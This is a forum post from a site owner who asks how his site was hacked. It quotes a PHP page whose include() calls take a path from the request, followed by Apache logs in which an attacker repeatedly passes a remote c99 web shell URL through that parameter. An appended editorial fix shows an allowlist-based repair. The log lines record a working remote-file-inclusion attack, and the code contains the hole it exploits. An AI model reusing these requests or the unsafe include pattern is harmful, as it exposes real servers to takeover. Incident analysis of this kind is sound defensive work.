schleckerbeck
Experienced member
Hi,
Found out today, to my horror, that my website was hacked because of a bug in the PHP script. Here is the file, and then an excerpt from the Apache2 logs:
PHP:
<?php
// Blacklist check on the POST parameter. Note that it inspects $_POST['name'],
// while the include() calls further down read $_GET['name'].
if (strpos($_POST['name'], '://') !== FALSE || strpos($_POST['name'], '../') !== FALSE)
    die('Illegal string');
require("db.inc.php");
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>main</title>
<link rel="stylesheet" type="text/css" href="style.css">
</head>
<body bgcolor="#FFFFFF" style="background-image:url(main.jpg); background-repeat:no-repeat; background-attachment:fixed; padding:0px;">
<div style="position:absolute; left:138px; top:0px; z-index:0">
<?php
// The request parameter is written straight into an HTML attribute without escaping.
echo "<img src=\"".$_GET['name']."/".$_GET['name'].".jpg\" alt=\"\" border=\"0\">";
?>
</div>
<div style="position:absolute; left:0px; top:150px; width:133px">
<?php
// Same blacklist check on the GET parameter; it runs before both include() calls below.
if (strpos($_GET['name'], '://') !== FALSE || strpos($_GET['name'], '../') !== FALSE)
    die('Illegal string');
if ($_GET['name'] == "ergebnisse")
{
    include($_GET['name']."/sub.php");
}
?>
</div>
<div style="position:absolute; left:145px; top:75px; width:580px; z-index:1">
<?php
// include() with a path built from the request parameter: if PHP is allowed to open
// URLs (allow_url_fopen / allow_url_include), a URL passed as name makes include()
// fetch and execute remote code (remote file inclusion). That is the pattern
// attempted in the log excerpt below.
include($_GET['name']."/index.php");
?>
</div>
</body>
</html>
And here is the Apache excerpt:
Code:
196.3.62.3 - - [08/Jul/2006:19:40:45 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.1" 200 918
196.3.62.3 - - [08/Jul/2006:19:40:46 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:40:47 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:40:48 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 908
196.3.62.3 - - [08/Jul/2006:19:40:50 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 909
196.3.62.3 - - [08/Jul/2006:19:40:51 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 959
196.3.62.3 - - [08/Jul/2006:19:40:53 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=buffer HTTP/1.1" 200 872
196.3.62.3 - - [08/Jul/2006:19:40:54 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 794
196.3.62.3 - - [08/Jul/2006:19:40:55 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=small_dir HTTP/1.1" 200 873
196.3.62.3 - - [08/Jul/2006:19:40:56 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_diz HTTP/1.1" 200 1736
196.3.62.3 - - [08/Jul/2006:19:40:58 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=change HTTP/1.1" 200 999
196.3.62.3 - - [08/Jul/2006:19:40:58 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=download HTTP/1.1" 200 870
196.3.62.3 - - [08/Jul/2006:19:41:01 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_gif HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:41:00 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_lnk HTTP/1.1" 200 1281
196.3.62.3 - - [08/Jul/2006:19:41:03 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_png HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:41:03 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_php HTTP/1.1" 200 788
196.3.62.3 - - [08/Jul/2006:19:41:05 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_jpg HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:41:06 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html_ HTTP/1.1" 200 1743
196.3.62.3 - - [08/Jul/2006:19:41:07 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html HTTP/1.1" 200 939
196.3.62.3 - - [08/Jul/2006:19:41:08 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_zip HTTP/1.1" 200 1286
196.3.62.3 - - [08/Jul/2006:19:41:10 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_css HTTP/1.1" 200 843
196.3.62.3 - - [08/Jul/2006:19:41:12 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=arrow_ltr HTTP/1.1" 200 797
196.3.62.3 - - [08/Jul/2006:19:42:27 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.1" 200 918
196.3.62.3 - - [08/Jul/2006:19:42:21 +0200] "POST /main.php?name=http://ernealizm.com/shell/c99.txt? HTTP/1.1" 200 80484
196.3.62.3 - - [08/Jul/2006:19:42:31 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:42:34 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:42:36 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 908
196.3.62.3 - - [08/Jul/2006:19:42:36 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 909
196.3.62.3 - - [08/Jul/2006:19:42:38 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 959
196.3.62.3 - - [08/Jul/2006:19:42:39 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=buffer HTTP/1.1" 200 872
196.3.62.3 - - [08/Jul/2006:19:42:40 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=sort_asc HTTP/1.1" 200 794
196.3.62.3 - - [08/Jul/2006:19:42:41 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=small_dir HTTP/1.1" 200 873
196.3.62.3 - - [08/Jul/2006:19:42:42 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_diz HTTP/1.1" 200 1736
196.3.62.3 - - [08/Jul/2006:19:42:43 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=change HTTP/1.1" 200 999
196.3.62.3 - - [08/Jul/2006:19:42:45 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=download HTTP/1.1" 200 870
196.3.62.3 - - [08/Jul/2006:19:42:45 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_lnk HTTP/1.1" 200 1281
196.3.62.3 - - [08/Jul/2006:19:42:47 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html HTTP/1.1" 200 939
196.3.62.3 - - [08/Jul/2006:19:42:47 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_gif HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:42:50 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_php HTTP/1.1" 200 788
196.3.62.3 - - [08/Jul/2006:19:42:50 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_png HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:42:52 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_jpg HTTP/1.1" 200 884
196.3.62.3 - - [08/Jul/2006:19:42:52 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_html_ HTTP/1.1" 200 1743
196.3.62.3 - - [08/Jul/2006:19:42:54 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_zip HTTP/1.1" 200 1286
196.3.62.3 - - [08/Jul/2006:19:42:54 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=ext_css HTTP/1.1" 200 843
196.3.62.3 - - [08/Jul/2006:19:42:57 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=arrow_ltr HTTP/1.1" 200 797
196.3.62.3 - - [08/Jul/2006:19:44:12 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=back HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:44:14 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=home HTTP/1.1" 200 918
196.3.62.3 - - [08/Jul/2006:19:44:16 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=forward HTTP/1.1" 200 828
196.3.62.3 - - [08/Jul/2006:19:44:19 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=up HTTP/1.1" 200 908
196.3.62.3 - - [08/Jul/2006:19:44:21 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=refresh HTTP/1.1" 200 909
196.3.62.3 - - [08/Jul/2006:19:44:23 +0200] "GET /main.php?name=http%3A%2F%2Fernealizm.com%2Fshell%2Fc99.txt%3F&act=img&img=search HTTP/1.1" 200 959
196.3.62.3 - - [08/Jul/2006:19:44:07 +0200] "POST /main.php?name=http://ernealizm.com/shell/c99.txt? HTTP/1.1" 200 82141
Could it be that Apache has some security hole because of the many GET requests? I had, after all, built in a check for whether the variable $name contains any foreign code (e.g. URLs).
Please HELP!
thx!
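An added example (editorial, not the poster's code and not a reply from the thread) of how the include in main.php can be rewritten so that the value reaching include() is never the request string: an allowlist of section names replaces the substring blacklist. The section names, the one-directory-per-section layout under the script directory and the fallback page are assumptions.

```php
<?php
// Added example, not the original script. Assumed layout: one directory per section
// (start/, ergebnisse/, kontakt/) next to this file, each with index.php, as in the post.
declare(strict_types=1);

// Allowlist of sections this page may include. Assumed names for illustration.
const PAGES = ['start', 'ergebnisse', 'kontakt'];

function resolvePage(?string $requested): string
{
    // Strict exact match against the allowlist; anything else falls back to the
    // first entry. A URL, '../', a null byte or a trailing '?' cannot get through,
    // because the returned value is always one of our own constants.
    return in_array($requested, PAGES, true) ? $requested : PAGES[0];
}

$name = resolvePage($_GET['name'] ?? null);
$base = __DIR__ . '/' . $name;

// Escape before writing into HTML even though the value is allowlisted.
$safe = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
echo '<img src="' . $safe . '/' . $safe . '.jpg" alt="">';

if ($name === 'ergebnisse') {
    require $base . '/sub.php';
}
require $base . '/index.php';

// Defence in depth, independent of this code: in php.ini set allow_url_include=Off
// (and allow_url_fopen=Off if nothing on the server needs it), so include() cannot
// open http:// paths at all.
```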